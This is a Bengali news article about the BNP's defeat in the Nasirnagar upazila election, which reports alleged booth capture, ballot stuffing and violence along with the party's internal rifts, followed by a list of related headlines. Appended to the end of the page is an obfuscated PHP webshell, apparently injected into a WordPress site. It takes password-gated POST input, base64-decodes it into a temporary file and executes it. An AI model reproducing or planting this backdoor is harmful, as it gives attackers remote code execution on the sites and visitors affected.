শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

নাসিরনগরে বিএনপির ভরাডুবির নেপথ্যে…

Upzila-electionপ্রশাসনকে জিম্মি করে ক্ষমতাসীন দলের আধিপত্য, কেন্দ্র দখল, বিএনপিদলীয় এজেন্টদের বের করে ব্যালটে সিল মারা, সংঘর্ষ মারধর, নাসিরনগর বিএনপির অভ্যন্তরীণ কোন্দল, জোটভুক্ত দলগুলোর নীরবতা, প্রার্থী বাছাইয়ে তৃণমূলকে উপেক্ষা, দায়িত্বশীল সিনিয়র নেতাদের প্রকাশ্যে নাফি প্রার্থীর পক্ষে মাঠে কাজ করাই বিএনপির প্রার্থী এম এ হান্নানের ভরাডুবির নেপথ্যে মূল কারণ। সরজমিন অনুসন্ধানে জানা যায়, উপজেলার ১৩টি ইউনিয়নের ৭৭টি কেন্দ্রের কোথাও স্বস্তিতে ছিলেন না প্রশাসনের লোকজন। সরকারদলীয় নেতাকর্মীদের দাপটের কাছে সবাই ছিলেন অসহায়। একজন প্রভাবশালী মন্ত্রীর এলাকা বলে আওয়ামী লীগদলীয় প্রার্থীকে পাস করানো ছিল প্রেসটিজ ইস্যু। কেন্দ্রের প্রিজাইডিংসহ সর্বস্তরের সরকারি লোকজন ছিলেন আতঙ্কে। অনেক কেন্দ্রে প্রিজাইডিং কর্মকর্তাকেও ব্যালটে সিল মারতে হয়েছে। সকাল থেকেই শুরু হয় তাণ্ডব। বেশ কয়েকটি কেন্দ্রে বিএনপিদলীয় এজেন্টদের টেনেহিঁচড়ে বের করে দেয়া হয়। মন্ত্রীর বাড়ির কাছের দুই কেন্দ্রে পুলিশ এবং সাংবাদিককে পিটিয়ে আহত করা হয়েছে। ভেঙে দেয়া হয়েছে এটিএন নিউজের ক্যামেরা। পুলিশের গাড়ি ভাঙচুর করে জাল ভোট দেয়ার দায়ে গ্রেপ্তারকৃত যুবককে ছিনিয়ে নেয়া হয়েছে। যেখানে প্রতিবাদ ছিল না, সেখানে কোন সমস্যা হয়নি। প্রতিরোধের চেষ্টা করায় কয়েকটি কেন্দ্রে সংঘর্ষ হয়েছে। আহত হয়েছেন অনেকে। বিএনপির অনেক নেতাকর্মী এখনও বাড়ি ছেড়ে পালিয়ে বেড়াচ্ছেন। ভোট কম কাস্ট হলে চাকরি হারানোর ভয়ে তটস্থ ছিলেন নির্বাচন সংশ্লিষ্টরা। ঢাকার ভিআইপিদের ফোনে চলতে হয়েছে পুরো প্রশাসনকে। এসব অভিযোগ বিএনপির উপজেলা, ইউনিয়ন ও ওয়ার্ডের নেতাকর্মীদের। নাম প্রকাশ না করার শর্তে বিএনপির একাধিক নেতা জানান, বিএনপি এখানে দুই ভাগে বিভক্ত। এক গ্রুপের নেতৃত্ব দিচ্ছেন একরামুজ্জামান নিজে। অপর গ্রুপের নেতৃত্বে আছেন উপজেলা বিএনপির সাবেক সভাপতি ইকবাল চৌধুরী, সম্পাদক এডভোকেট মামুন ও কুণ্ডা ইউনিয়নের চারবারের চেয়ারম্যান মো. ওমরাও খান। দলীয় মনোনয়ন চেয়েছিলেন সাতজন। দলীয় কোন্দল নিষ্পত্তি না করেই করা হয়েছে প্রার্থী বাছাই। প্রার্থী বাছাই পক্রিয়াটি সঠিক ছিল না। উপজেলা ও কেন্দ্রের সঙ্গে সংশ্লিষ্ট সৈয়দ এ কে এম একরামুজ্জামান নিজ পছন্দে প্রার্থী দিয়েছেন। কোন সভা করা হয়নি। নেয়া হয়নি তৃণমূলের মতামত। স্থানীয় নেতাকর্মীরা এ প্রার্থীকে মনেপ্রাণে গ্রহণ করতে পারেননি। ফলে চেয়ারম্যান পদে বিদ্রোহী প্রার্থী হন আহসানুল হক মাস্টার। ভাইস চেয়ারম্যান পদে দাঁড়িয়ে যান মো. ছোয়াব খান। অথচ আওয়ামী লীগে ছিল না একজন বিদ্রোহী প্রার্থীও। পুরো প্যানেলে পাস করেছে দলটি। দলের আন্দোলন-সংগ্রামে এম এ হান্নানের ভূমিকা প্রশংসনীয়। কিন্তু ভোটের খেলায় তিনি অনেকের চেয়ে পেছনে পড়ে আছেন। তার অতীত কিছু কর্মকাণ্ড নিয়ে তৃণমূল ছিল সমালোচনামুখর। দলীয় কোন্দল ও মেটাতে পারেননি তিনি। সান্ত্বনা দিয়ে সিনিয়র নেতাদের ম্যানেজ করে মাঠে নামাতে ব্যর্থ হয়েছেন হান্নান। ফলে ওমরাও খান ও ইকবাল চৌধুরীর মতো উপজেলার প্রথম সারির নেতারা প্রকাশ্যে কাজ করেছেন নাফি প্রার্থী আহসানুল হক মাস্টারের পক্ষে। এ ছাড়া উপজেলা সদরে অনেক ভাল ভাল বিএনপি নেতা গোপনে আওয়ামী লীগ প্রার্থীর পক্ষে কাজ করেছেন। বিষয়টি ভোটের পর প্রকাশ পেয়েছে। রহস্যজনক কারণে বিএনপির অন্যতম শরিক দল জামায়াতে ইসলাম ও ইসলামী ঐক্যজোট ছিল পুরোপুরি নীরব। উপজেলা ইসলামী এক্যজোটের সাংগঠনিক সম্পাদক প্রকাশ্যে কাজ করেছেন আওয়ামী লীগ প্রার্থীর পক্ষে। 

ওদিকে সংবাদ সম্মেলনে বিএনপি প্রার্থী এম এ হান্নান প্রহসনের নির্বাচনের ফলাফল প্রত্যাখ্যান করে বলেন, ২৩শে মার্চ সুপরিকল্পিতভাবে ব্যাপক সহিংসতা ও ভোট জালিয়াতির মাধ্যমে আমাদের পরাজিত করা হয়েছে। আওয়ামী লীগ প্রার্থী এ টি এম মনিরুজ্জামানের বাহিনী ও দায়িত্বপ্রাপ্ত কর্মকর্তাদের সহায়তায় আমাদের এজেন্টদের বের করে কেন্দ্র দখল করে ভোট জালিয়াতি করা হয়েছে। তিনি ফলাফল বাতিল করে পুনঃনির্বাচনের দাবি জানান।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}